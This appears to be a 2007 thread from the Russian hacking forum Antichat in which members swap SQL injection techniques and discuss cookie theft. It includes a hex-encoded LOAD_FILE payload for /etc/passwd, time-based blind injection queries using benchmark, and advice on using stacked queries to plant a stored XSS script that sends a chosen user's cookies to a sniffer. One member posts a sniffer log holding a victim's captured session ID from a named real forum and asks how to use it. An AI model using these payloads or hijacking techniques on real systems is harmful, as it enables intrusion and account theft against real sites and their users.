Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.11.2007, 13:51
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?
|
|
|
07.11.2007, 14:01
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от SVAROG
а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?
со своего компа ты не подключишься, LOAD_FILE('/etc/passwd') не прокатывает по двум причинам: 1)фильтрация кавычек (мэйджик квотс включен) 2)даже если закодировать /etc/passwd в hex (LOAD_FILE(0x2F6574632F706173737764)) у тебя нет файловых привелегий и читать и записывать файлы ты не сможешь
__________________
Карфаген должен быть разрушен...
|
|
|
|
07.11.2007, 17:45
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
Дам-с,на мой вопрос так никто и не ответил...
SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,1,(select 1 union select 2 ) )
|
|
|
|
07.11.2007, 19:22
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от gemaglabin
Дам-с,на мой вопрос так никто и не ответил...
как это не ответил, я в http://forum.antichat.ru/thread51884.html
этом посте помоему понятно описал использование инъекции в order by, а то что я дал линк, а не описание, это потому, что не вижу смысла в двух одинаковых постах на форуме
__________________
Карфаген должен быть разрушен...
|
|
|
|
07.11.2007, 20:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Jetexe
Есть Sql Inj в движке и есть Xss в некотором параметре в профиле пользователя. Нужно, внедрить Xss в этот параметр строго у определённого юзера из БД. Есть варианты?
Если это мускул, то нет вариантов, если другой тип БД, то смотря какой тип
__________________
Карфаген должен быть разрушен...
|
|
|
|
07.11.2007, 20:21
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ну допусти если это Mssql то ты можешь разделять запросы с помошью ; и вставить запрос например Update и изменить данные пользователя в БД например на ядовитый скрипт. т.о когда пользователь зайдет в свой профиль, сработает активная Xss и соответственно получишь куки пользователя на снифер
__________________
Карфаген должен быть разрушен...
|
|
|
|
08.11.2007, 18:14
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от gemaglabin
Ок , а если иньекция в order by и вывода нет ? ответит кто? %)
Чет универсального способа немогу придумать, ты хоть намекни, я понимаю, что при таком раскладе нужно составить условие при котром один из вариантов вызывает ошибку, а т.к. сначала происходит проверка синтаксиса то и этот вариант отпадает, еще есть вариант использования into outfile но это настолько специфично (зависит от настроек php и прав пользователя mysql) что я не рассматриваю это как вариант
__________________
Карфаген должен быть разрушен...
|
|
|
|
08.11.2007, 18:36
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
Заставил юзера пройти по ссылке шоп его куки шли на сниффер.
Прошел,Вижу куки.Что делать с этим?
Имя переменной Значение
ACCEL_ADDR
HTTP_ACCEPT */*
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_ACCEPT_LANGUAGE ru
HTTP_CACHE_CONTROL
HTTP_CONNECTION close
HTTP_COOKIE PHPSESSID=21ac6a328e4aa73ce55ef32e2b3193f0
HTTP_HOST tx.tehnofil.ru
HTTP_REFERER http://forum.netis.ru/index.php?act=Msg&CODE=03&VID=in&MSID=277026
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRA 4.10 (build 01952); MRSPUTNIK 1, 8, 0, 17 SW; .NET CLR 1.0.3705)
LANG
MM_CHARSET
REMOTE_PORT 57014
SERVER_ADDR 127.0.0.1
SERVER_ADMIN support@uploader.ru
SERVER_NAME tx.tehnofil.ru
SERVER_PORT 80
SERVER_SIGNATURE Apache/1.3.37 Server at tx.tehnofil.ru Port 80
SERVER_SOFTWARE Apache/1.3.37 (Unix) PHP/4.4.7 mod_ssl/2.8.28 OpenSSL/0.9.7e
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING id=test
REQUEST_URI /tsk.php?id=test
SCRIPT_NAME /tsk.php
PHP_SELF /tsk.php
|
|
|
|
08.11.2007, 18:37
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
forum.netis.ru это форум где надо угнать куки
|
|
|
|
08.11.2007, 18:52
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.7272 сек)
mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=48,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.0006 сек)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
